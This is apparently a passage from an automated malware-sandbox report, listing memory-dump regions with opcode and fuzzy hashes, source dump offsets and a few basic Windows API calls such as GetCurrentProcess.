                                          • Opcode ID: d7e19c038b07cd17a512273668f89b52c558552a1976c42e5bef3bfb4f6c1870
                                          • Instruction ID: 6a62977b18b47db0c9028be851af11b02965577af8fc84057d4178a7d95806df
                                          • Opcode Fuzzy Hash: d7e19c038b07cd17a512273668f89b52c558552a1976c42e5bef3bfb4f6c1870
                                          • Instruction Fuzzy Hash: 1ED0A774402308CFCB58DF71D4989893B71FF05341B1010A4DA155F295C7318A40DF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ec3d909c81592da4cfc3e795fb7f00375a72cea406efd1179b04504a4e8a0f6
                                          • Instruction ID: 5b6129c621b73ce79b8ec1eec6d0adb7baf86462229a8178e8339abb7ba2d598
                                          • Opcode Fuzzy Hash: 7ec3d909c81592da4cfc3e795fb7f00375a72cea406efd1179b04504a4e8a0f6
                                          • Instruction Fuzzy Hash: 8EE19030B102189FCB54EFB4E959AAE7BF6AF89308F119469E405DB3A1DB34DC41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d8a2bfbf143f262ccfad049cf724eee01b866c6974e07107de4f60764664c2c
                                          • Instruction ID: 03c5486d0513ef9774f60d834a7372694e9823af79d5f0ce45e0dd832b03fc76
                                          • Opcode Fuzzy Hash: 7d8a2bfbf143f262ccfad049cf724eee01b866c6974e07107de4f60764664c2c
                                          • Instruction Fuzzy Hash: B8910230D00229DFDB64DFA5D884BDDFBB2BF89304F1094A9E508AB251DB349A85CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c4b8fb0a76af5015c7c23c4b4af29b51892aeef29aa12264dfba6cfb127afe5
                                          • Instruction ID: c26bb4f530af1d57921809026509c5c3e898f11a93fef917222924e5d67d463a
                                          • Opcode Fuzzy Hash: 6c4b8fb0a76af5015c7c23c4b4af29b51892aeef29aa12264dfba6cfb127afe5
                                          • Instruction Fuzzy Hash: 0F817A30D12308DFC744EFB6E584A8DBBF2FB48789B149965E406DB268EB30A940CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0258ae62bcb962204e7659e75aa1eec6905c2584b8e1149c0d672a47df760f8f
                                          • Instruction ID: d144825a83b98d280917ad437c8ae2289409a4fade06b44f25bc057cb54ef1b3
                                          • Opcode Fuzzy Hash: 0258ae62bcb962204e7659e75aa1eec6905c2584b8e1149c0d672a47df760f8f
                                          • Instruction Fuzzy Hash: FC615C34D06308DFCB88EFA5E54468DBBF2FB88345F109965E516DB268EB30A945CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad4ff9b571277f61b00968b51f577a00ace24eed4e88e5895431f139705dedf8
                                          • Instruction ID: 49dc9d488a67a664c12e9258fd7db5db97771bd69607eb0dcc89c8c488a7396f
                                          • Opcode Fuzzy Hash: ad4ff9b571277f61b00968b51f577a00ace24eed4e88e5895431f139705dedf8
                                          • Instruction Fuzzy Hash: AE518B35B00218DFCF44EF64E458AED7BB6EF88315F145429E902AB3A0CB319D85DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2a0bab1983374f635612f5e28078ae72967d71643cc6faa31a708093a8f505f
                                          • Instruction ID: 3799214d0c19666d4029d04b6e4d5d65e91b05daa077a52540ad0724cecdea80
                                          • Opcode Fuzzy Hash: d2a0bab1983374f635612f5e28078ae72967d71643cc6faa31a708093a8f505f
                                          • Instruction Fuzzy Hash: CD617A74D12309CFC744EFA6E584A8DBBF2FB48389B109965E416DB268EB30A941CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9612d1088b614a356b8deef8232166f4c81b0804ff0008e12e61ce7317a6799
                                          • Instruction ID: 3235b9810b7952689f322c8bcdd7d1818412a1e6d4aa212d194711f3e6e22f6a
                                          • Opcode Fuzzy Hash: b9612d1088b614a356b8deef8232166f4c81b0804ff0008e12e61ce7317a6799
                                          • Instruction Fuzzy Hash: 31616B34E02308DFCB44EFA6E54468DBBF2FB88349F109965E516DB268EB30A941CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 386c78ac535f0ed872b8d92890d6c8afaccb37284233c7812182f6daff588523
                                          • Instruction ID: b06e659b007c429ce59269a2924623fcc0c82a12a1c38fe90ead520938a594d0
                                          • Opcode Fuzzy Hash: 386c78ac535f0ed872b8d92890d6c8afaccb37284233c7812182f6daff588523
                                          • Instruction Fuzzy Hash: 6C517B74D02309DFCB44EFA6E58468DBBF2FB88355B209965D416EB368EB34A941CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d1d096e816d1307d6e1465ea325b8f932bdedebcebaec7e00a87800859f23c3
                                          • Instruction ID: ea22ea6b9684e57455eef168d7fe9c38f4ba25fc5cae14ce3efa1d04d7761bbc
                                          • Opcode Fuzzy Hash: 0d1d096e816d1307d6e1465ea325b8f932bdedebcebaec7e00a87800859f23c3
                                          • Instruction Fuzzy Hash: AA516A34D02308DFCB44EFA6E58468DBBF2FB88345B209965D516DB368EB34A941CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a505f9e322e76d15fbbb2e4e6a515038efbb8c3648ca37dfcca4455d625d993
                                          • Instruction ID: 46b05cb50219a3e1c10c9d52d21e8edae6ffd46e3878bcf245f3dfb6f8526431
                                          • Opcode Fuzzy Hash: 5a505f9e322e76d15fbbb2e4e6a515038efbb8c3648ca37dfcca4455d625d993
                                          • Instruction Fuzzy Hash: 26516C34E02309DFCB44EFA5E58458DBBF2FB48355B109965D416DB368EB34A941CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eece0f91a0531f24a915b9c52a293cfd802c8c7dbe53116952a35d24cfc7f140
                                          • Instruction ID: c66009711cd74fcfe44984465214126324737dfc411c5613db09075fb64b2619
                                          • Opcode Fuzzy Hash: eece0f91a0531f24a915b9c52a293cfd802c8c7dbe53116952a35d24cfc7f140
                                          • Instruction Fuzzy Hash: 3F517B34E12309DFC744EFB6E58458DBBF2FB88745B209965E416DB268EB34A941CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 382213f88da7788c27232698ee3367902080b0859162e5df1a9ae007e25ba124
                                          • Instruction ID: 1e09274f74452c4f71983018fa823355f127188df140681cc7031d2ee0bd7840
                                          • Opcode Fuzzy Hash: 382213f88da7788c27232698ee3367902080b0859162e5df1a9ae007e25ba124
                                          • Instruction Fuzzy Hash: F3418B34E083158FCB54EFB8E848AAEB7B1FF8A714F118569D405E72A1D735E841CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 576d1fc490dce3a18c71392eee34861af5086b6305a5cb1edc373a7067fed3c1
                                          • Instruction ID: 1401901b25d0a4723dc48de6f490951f23951e16243b9b3f84f6635e4a2b4ef9
                                          • Opcode Fuzzy Hash: 576d1fc490dce3a18c71392eee34861af5086b6305a5cb1edc373a7067fed3c1
                                          • Instruction Fuzzy Hash: 8D414C31B102199FCF15AF60E8859AE7BABFF84304F048429FA029B394CB35DD56DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfcc7be46a87a54e63a83477c79952024f4ff4cbb521c97a74da1a6aca0add23
                                          • Instruction ID: 8d6f5503058b9d0cb22ae2aff7c8a903d3d66802d2fe5599c316f4d8f0be5a1d
                                          • Opcode Fuzzy Hash: cfcc7be46a87a54e63a83477c79952024f4ff4cbb521c97a74da1a6aca0add23
                                          • Instruction Fuzzy Hash: 3141F775E016189FDB44DFAAD841AEEFBF2EF88300F24C169E418A7354DB309946CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f19172b968d76f8098443e324452aa0ab6994eca7e8bdaf75bb9e27d6dc5bee
                                          • Instruction ID: 57cda5213c30f6e1f0524f19f46d059ddd6eb9a38064c87d392ca68a75f9f347
                                          • Opcode Fuzzy Hash: 8f19172b968d76f8098443e324452aa0ab6994eca7e8bdaf75bb9e27d6dc5bee
                                          • Instruction Fuzzy Hash: BA31E7B5E052099FCB84CFA9C4805AEBBF1FF89200F10956AD815E7354D7349A42CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 38af9690812a95f0fee8e87a9a7412ea63d22b070d371b22da29b8806420e4bc
                                          • Instruction ID: 6ea7e4e0c39f3fa0a04d0269e689af3535491c5b19b1fce0cc3a4c73991faaf7
                                          • Opcode Fuzzy Hash: 38af9690812a95f0fee8e87a9a7412ea63d22b070d371b22da29b8806420e4bc
                                          • Instruction Fuzzy Hash: 4631D7B4E052099FCB44CFAAC480AEEFBF2FB88300F10956AD815A7354D7349941CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f708708d9bb319976ed2ba27d5820cfbd94a09f188055fc223591a4342a7361
                                          • Instruction ID: 7e5f3d66e6cc4088c1c33d27141972058a8e47debdf0cc60f0c9a0ea77814258
                                          • Opcode Fuzzy Hash: 4f708708d9bb319976ed2ba27d5820cfbd94a09f188055fc223591a4342a7361
                                          • Instruction Fuzzy Hash: F431E471E00219DFDB18DFA6D8457DEBBB2AF88304F1095A9D508B7254EB345A85CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 469b9c28316f5ea43aa2164df22e9223ad18b4b7819d107989f35324d50201c7
                                          • Instruction ID: 41f0bd5310ef44f597b0af137c12386eb93953264cd01c557bac51d8f5117106
                                          • Opcode Fuzzy Hash: 469b9c28316f5ea43aa2164df22e9223ad18b4b7819d107989f35324d50201c7
                                          • Instruction Fuzzy Hash: 20314770E05309DFDB48DFA9D5815AEBBF2BB89300F21D9AAD408E7365D3309A418F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3b39a1118850b10d2a02267f5aea061548212055d5cb1671c65afd48a0ef8b7
                                          • Instruction ID: 6de735553abbf2207985f2aa1e534c9ebcbe3ff5abf01b2e4e143bc5a04ca75c
                                          • Opcode Fuzzy Hash: b3b39a1118850b10d2a02267f5aea061548212055d5cb1671c65afd48a0ef8b7
                                          • Instruction Fuzzy Hash: AA314970D05309EFCB84DFA5D5845AEBBF1FF89200F2499AAD405A7252E7349A05CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405043446.0000000000E3D000.00000040.00000001.sdmp, Offset: 00E3D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca5a42eed7e978c48cd60aa47fac3d9ffd21c296ca0c1f27b38275f946e954a8
                                          • Instruction ID: 632146718a9e6af31c9439101065c9cdc8bfccf3fa1c0574e7f16243af38178d
                                          • Opcode Fuzzy Hash: ca5a42eed7e978c48cd60aa47fac3d9ffd21c296ca0c1f27b38275f946e954a8
                                          • Instruction Fuzzy Hash: 632125B1508240EFCB11DF54ECC4B66BF65FB88328F2485A9E8055B246C336D856CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7732702db851b0763e32b30a2baeba2744b24ee6359837d66e5d79bf9fec542
                                          • Instruction ID: 275f0a446297f1670d377a727d19d924943dc4c26f5575f42523fd727346d1d0
                                          • Opcode Fuzzy Hash: a7732702db851b0763e32b30a2baeba2744b24ee6359837d66e5d79bf9fec542
                                          • Instruction Fuzzy Hash: 19219D75B0020A8FCF50EFB8D884AAEBBB5EB88355F014565E905DB361DB30D880CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405092273.0000000000E4D000.00000040.00000001.sdmp, Offset: 00E4D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d002f435d5d212235eeb724ebf986c00d8ba61395d140f4549ca6bf59e51e16e
                                          • Instruction ID: 4083915db0eb01b1d12b44c906365914c2cfede6e0f86b655fa62907946a58e2
                                          • Opcode Fuzzy Hash: d002f435d5d212235eeb724ebf986c00d8ba61395d140f4549ca6bf59e51e16e
                                          • Instruction Fuzzy Hash: 5A210771908200DFDB11DF50EDC0B66BBA5FB84318F24C6ADE9096B356C376D846CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405092273.0000000000E4D000.00000040.00000001.sdmp, Offset: 00E4D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bcadaa864cb6d7cf9dd1127b01e5046bb0220ad30734ec38d9d80baaac4b716
                                          • Instruction ID: 65fcf3bc0035cb916d45ad7b90aaad8ce521b11ab4717f631cb429ddec111e13
                                          • Opcode Fuzzy Hash: 0bcadaa864cb6d7cf9dd1127b01e5046bb0220ad30734ec38d9d80baaac4b716
                                          • Instruction Fuzzy Hash: 5F21F275508240DFCB14DF54ECC4B66BB66FB84318F24C9A9E80A5B246C33AD847CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52ae6a9db7ea85f07779c7de660be156286bb0ecf2e3308bdeee74a3037cc4f7
                                          • Instruction ID: 2f775b19c03429fef091b01fda2d83c2d1a9ae406abe6b3facf6df9acbdcdd46
                                          • Opcode Fuzzy Hash: 52ae6a9db7ea85f07779c7de660be156286bb0ecf2e3308bdeee74a3037cc4f7
                                          • Instruction Fuzzy Hash: 98214931A00208DFCF04EFA4E985AEDBBB5EF88315F145429E905BB350DB329D94DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405092273.0000000000E4D000.00000040.00000001.sdmp, Offset: 00E4D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8b742e902bea54ae0f6c2cfbc83e2a0afdc2166eab60d367c1af76ec1956fcd
                                          • Instruction ID: fcef3664227f0601a17a9611b9beda6a04e415e2928c0538fc36cc3e9e2c47bf
                                          • Opcode Fuzzy Hash: b8b742e902bea54ae0f6c2cfbc83e2a0afdc2166eab60d367c1af76ec1956fcd
                                          • Instruction Fuzzy Hash: 4421507550D3C08FCB12CF24D994B15BF71EB46314F29C5EAD8498B697C33A984ACB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c0d45eb2221ecd1b92de704757d67ee47ca71bdd200aaecd06f89c84e40eb0
                                          • Instruction ID: 79de7558ea6529626ec1dcdb4d5a937ed1eb70933f6dc8d0ef759453aa5c72f7
                                          • Opcode Fuzzy Hash: 14c0d45eb2221ecd1b92de704757d67ee47ca71bdd200aaecd06f89c84e40eb0
                                          • Instruction Fuzzy Hash: 58119130F063149FDB74BB75B8056BB76A6BF84764F259529E9069B281DB34880087D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405043446.0000000000E3D000.00000040.00000001.sdmp, Offset: 00E3D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                          • Instruction ID: 1b773b5c7e22ea394551f8e919d7efdb36f4f760990d87fb75629e6a0d595b89
                                          • Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                          • Instruction Fuzzy Hash: 8F11E676504280DFCF12CF14E9C4B16BF71FB84328F24C6A9D8455B616C336D85ACBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405092273.0000000000E4D000.00000040.00000001.sdmp, Offset: 00E4D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
                                          • Instruction ID: 500160c6907b33e3ef804c8a0ac7f68acc4e226cbe5c47515073a905cb2d8b69
                                          • Opcode Fuzzy Hash: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
                                          • Instruction Fuzzy Hash: 6111DD75908280DFCB01CF50E9C4B15FBB1FB84328F28C6ADD8495B666C37AD85ACB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405043446.0000000000E3D000.00000040.00000001.sdmp, Offset: 00E3D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8dab1fcd3cd3a7d3ef8be33cf28a31081b96e7e95883afaa1ff6013e57450028
                                          • Instruction ID: cb6f716699f7b15802d34ab03eb09dcbc80b5e27925037d861a07c77e018ad3a
                                          • Opcode Fuzzy Hash: 8dab1fcd3cd3a7d3ef8be33cf28a31081b96e7e95883afaa1ff6013e57450028
                                          • Instruction Fuzzy Hash: 0A01427180C3809AE7205F25ECC8BA6BF9CEF41378F18855BFD046B242C3399804CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405043446.0000000000E3D000.00000040.00000001.sdmp, Offset: 00E3D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d877a3ef6486eee4c4e768f6212f3090eb502f00bf43693511fd69f8ad4dd9c
                                          • Instruction ID: cbdff36432a6fd863ce9af00695ab4b98e5bce559e25130b45dd7a92c7029dea
                                          • Opcode Fuzzy Hash: 5d877a3ef6486eee4c4e768f6212f3090eb502f00bf43693511fd69f8ad4dd9c
                                          • Instruction Fuzzy Hash: 6AF062714082849EE7108E16DDC8BA6FF98EB41778F18C55AFD085B286C3799C44CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2dac17f1ff6c55c4f51fc3f66cf0c41d275b1cf2915f7643b4cf56d28f421c4b
                                          • Instruction ID: ce569f1e938893bc9fdf03181bf5e5399b691bae379034fa58342deb5e0108dd
                                          • Opcode Fuzzy Hash: 2dac17f1ff6c55c4f51fc3f66cf0c41d275b1cf2915f7643b4cf56d28f421c4b
                                          • Instruction Fuzzy Hash: 22F05E70C09358AFCB45EFB8D8406DDBFB1FB09340F00859AE855E3251D3304A04DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a51d3f7917161d1cd9f75effdcbe2b44d33940f456eb57cd099fe260651751d5
                                          • Instruction ID: 51a516184c9f192ea03255562d48eac8726c9286e15e316c399655c56c1f6e96
                                          • Opcode Fuzzy Hash: a51d3f7917161d1cd9f75effdcbe2b44d33940f456eb57cd099fe260651751d5
                                          • Instruction Fuzzy Hash: 4AF03974C09348AFCB55EFB8D8053EEBFB5BF44240F1446AAD858A3251D7305A40CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4238b081d78cf9587317188d94ae0582aca77b96783caa112ff2f462c1a86ccc
                                          • Instruction ID: ac781ecfbfaeb929e633e1e12b045ae89a2300982ac3765abad683e30b131912
                                          • Opcode Fuzzy Hash: 4238b081d78cf9587317188d94ae0582aca77b96783caa112ff2f462c1a86ccc
                                          • Instruction Fuzzy Hash: C9E08C3080B384AFC3999FB1B8083D53B68DB06646B1008EDD20AD3192DB340845CB32
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 916a740478a26073fd844f6207efde0c25cceff81baf2dfa72efc0c0d6158525
                                          • Instruction ID: 093e0eceda6b2373ce8c9aee9b1a94360eac64a38764db22f96d463d6216d311
                                          • Opcode Fuzzy Hash: 916a740478a26073fd844f6207efde0c25cceff81baf2dfa72efc0c0d6158525
                                          • Instruction Fuzzy Hash: 8CE0C2BAB11308DFCF506AF5F9497EA7F68EB04353F004532FA4186001D7308058CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b334efed010427a74587b71bdaa933a3f42c6d282be7f476ef7a75d9cc606fc0
                                          • Instruction ID: b833addb1c3987764106ed7dcb1adbae10e2239ae023913c2778c62a381a1822
                                          • Opcode Fuzzy Hash: b334efed010427a74587b71bdaa933a3f42c6d282be7f476ef7a75d9cc606fc0
                                          • Instruction Fuzzy Hash: 17F02B78D16328CFCBA5DF69D880ADDBBB1FB09314F501199E849A7310DB31AA82CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e201e42e0628beffa36e999e37894aa68ecb003938415bb59ae8e17d44548ec8
                                          • Instruction ID: accfa9794fdfe7f8cac3d83c06d4bbf1571b15e6662bc8220cbe536e5c5cc83e
                                          • Opcode Fuzzy Hash: e201e42e0628beffa36e999e37894aa68ecb003938415bb59ae8e17d44548ec8
                                          • Instruction Fuzzy Hash: 80E07E74D01318AFCB44EFA8E9457AEBBB4BB48305F1086AAD818A3350E7705A41CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1a50318eb20808acfd3dda59da573d1c1c50def34d411a6f195ddb294b6c644
                                          • Instruction ID: 402868fed34f55561203a9c127842bb634affabad1df5df7429850060520240f
                                          • Opcode Fuzzy Hash: b1a50318eb20808acfd3dda59da573d1c1c50def34d411a6f195ddb294b6c644
                                          • Instruction Fuzzy Hash: 69E03938A112148FD750CF68C48498EB7B2FF44300F129590D809AB318C730EA80CA40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c35a0b0a46f3ab763c15063647308aa7638343b3f3cc7d54d984bc34c63610b1
                                          • Instruction ID: b7c806d7b2da50d95327834b6304b1cc38409bfe26480f460218c78649017de1
                                          • Opcode Fuzzy Hash: c35a0b0a46f3ab763c15063647308aa7638343b3f3cc7d54d984bc34c63610b1
                                          • Instruction Fuzzy Hash: 2EE09A309153298FDBA4EFA9D880BCDB7B1FF89209F108496D119F6224DB306D85CF20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c9196ecf4c3f4a1733a7ac802af5462d50915571a43af83f6d5be0f7beb0da4
                                          • Instruction ID: 833e57af0fed1f6ee13e389dff0de4852d6d5df56dfc782e035af41944791530
                                          • Opcode Fuzzy Hash: 7c9196ecf4c3f4a1733a7ac802af5462d50915571a43af83f6d5be0f7beb0da4
                                          • Instruction Fuzzy Hash: 92D0927090622ACBDB54EF65EC81ACDB6B1FB88209F10AEA5D104A7168E7306A019F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00F4B8D0
                                          • GetCurrentThread.KERNEL32 ref: 00F4B90D
                                          • GetCurrentProcess.KERNEL32 ref: 00F4B94A
                                          • GetCurrentThreadId.KERNEL32 ref: 00F4B9A3
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
